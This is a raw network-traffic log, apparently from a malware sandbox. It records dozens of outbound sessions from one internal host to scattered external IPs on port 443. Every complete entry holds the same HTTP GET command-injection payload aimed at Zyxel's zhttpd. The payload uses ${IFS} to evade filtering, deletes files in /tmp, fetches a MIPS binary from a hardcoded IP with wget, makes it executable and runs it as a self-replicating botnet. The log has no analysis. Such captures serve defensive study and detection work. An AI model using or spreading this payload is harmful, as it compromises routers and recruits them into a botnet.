                                                      Feb 2, 2024 06:35:56.702115059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5217192.168.2.144134490.76.130.201443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.702148914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5218192.168.2.1449958142.179.176.55443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.702188015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5219192.168.2.1453480131.91.199.203443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.702239990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5220192.168.2.144070050.113.254.111443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.702280998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5221192.168.2.1435122219.69.27.52443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.702330112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5222192.168.2.144517643.52.113.239443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.702368975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5223192.168.2.144979478.136.19.159443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.702414989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5224192.168.2.1438036115.181.135.159443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.702466965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5225192.168.2.14383922.20.166.200443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.702503920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5226192.168.2.145141062.30.210.54443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.702538013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5227192.168.2.1448924140.197.161.13443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.702572107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5228192.168.2.145886471.191.155.75443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.702630997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5229192.168.2.1450126153.181.88.204443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.702656031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5230192.168.2.1440726212.4.9.209443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.702718019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5231192.168.2.143885861.92.94.5443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.702750921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5232192.168.2.143497813.222.187.248443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.702792883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5233192.168.2.145678485.109.121.105443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.702830076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5234192.168.2.145748018.35.144.169443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.702864885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5235192.168.2.143736647.124.31.73443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.702914953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5236192.168.2.1437496124.237.237.240443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.702950954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5237192.168.2.145890637.255.154.124443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.702996969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5238192.168.2.143492642.250.228.165443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.703026056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5239192.168.2.1460450175.167.74.3443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.703066111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5240192.168.2.1436436221.240.79.196443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.703119993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5241192.168.2.143843063.19.180.93443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.703154087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5242192.168.2.144852654.134.184.80443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.703186035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5243192.168.2.1455792143.145.102.42443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.703253984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5244192.168.2.1442500177.69.54.142443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.703289986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5245192.168.2.1454180164.25.124.14443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.703315020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5246192.168.2.146079425.239.90.50443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.703341961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5247192.168.2.1446280184.19.159.73443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.703389883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5248192.168.2.1455740164.242.109.18443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.703443050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5249192.168.2.1448604178.31.119.81443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.703486919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5250192.168.2.143530296.107.205.218443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.703551054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5251192.168.2.14513802.74.48.92443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.703572989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5252192.168.2.146001877.163.110.142443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.703636885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5253192.168.2.143900483.145.230.127443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.703680992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5254192.168.2.1442188184.242.122.222443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.703711033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5255192.168.2.1453828162.151.245.80443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.703756094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5256192.168.2.1458972110.118.42.33443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.703788042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5257192.168.2.143556685.12.154.12443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.703844070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5258192.168.2.1446132168.48.20.0443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.703891993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5259192.168.2.1451368113.42.131.191443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.703924894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5260192.168.2.1450364128.112.207.145443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.703962088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5261192.168.2.145771685.85.247.145443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.704004049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5262192.168.2.1456122180.29.195.132443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.704057932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5263192.168.2.1459676146.147.243.65443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.704087019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5264192.168.2.144518459.95.54.223443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.704132080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5265192.168.2.1456916152.82.239.139443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.704161882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5266192.168.2.1445572166.34.73.236443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.704216957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5267192.168.2.145098671.219.235.146443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.704256058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5268192.168.2.1443630152.17.36.192443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.704279900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5269192.168.2.143851666.209.123.79443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.704348087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5270192.168.2.1439226198.17.76.199443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.704368114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5271192.168.2.1446088125.224.135.165443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.704394102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5272192.168.2.1448952184.253.157.92443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.704435110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5273192.168.2.1436534150.204.249.255443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.704493999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5274192.168.2.144470012.40.64.111443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.704524994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5275192.168.2.143416482.38.207.41443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.704585075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5276192.168.2.145084474.160.148.171443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.704617023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5277192.168.2.1452918149.37.54.72443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.704672098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5278192.168.2.145914051.61.207.231443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.704689980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5279192.168.2.145004457.97.6.36443
                                                      TimestampBytes transferredDirectionData
